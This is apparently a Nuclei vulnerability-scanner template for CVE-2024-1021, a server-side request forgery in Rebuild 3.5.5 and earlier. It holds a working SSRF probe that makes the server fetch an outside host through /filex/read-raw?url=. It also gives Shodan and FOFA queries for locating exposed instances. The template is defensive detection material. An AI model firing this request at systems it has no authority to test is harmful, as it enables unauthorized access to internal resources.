49 lines
1.8 KiB
YAML
49 lines
1.8 KiB
YAML
id: CVE-2024-1021
|
|
|
|
info:
|
|
name: Rebuild <= 3.5.5 - Server-Side Request Forgery
|
|
author: BMCel
|
|
severity: critical
|
|
description: |
|
|
There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
|
|
reference:
|
|
- https://github.com/getrebuild/rebuild
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
|
|
- https://vuldb.com/?ctiid.252290
|
|
- https://vuldb.com/?id.252290
|
|
- https://github.com/tanjiti/sec_profile
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2024-1021
|
|
cwe-id: CWE-918
|
|
epss-score: 0.00973
|
|
epss-percentile: 0.83349
|
|
cpe: cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: ruifang-tech
|
|
product: rebuild
|
|
shodan-query: http.favicon.hash:"871154672"
|
|
fofa-query: "icon_hash=\"871154672\""
|
|
tags: cve2024,cve,rebuild,ssrf,ruifang-tech
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}"
|
|
- "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body_2, "<h1> Interactsh Server </h1>")'
|
|
- '!contains(body_1, "<h1> Interactsh Server </h1>")'
|
|
- 'status_code_2 == 200'
|
|
condition: and
|
|
# digest: 4b0a00483046022100ecd416627d1c6165d69bef643a983b65fafaabe6417bb79944e15af02b39b03f022100a5ed6b41e0bf5736e99ed54d1c1a53abe9956c3b773c3cf65c24507b7d2087eb:922c64590222798bb761d5b6d8e72950 |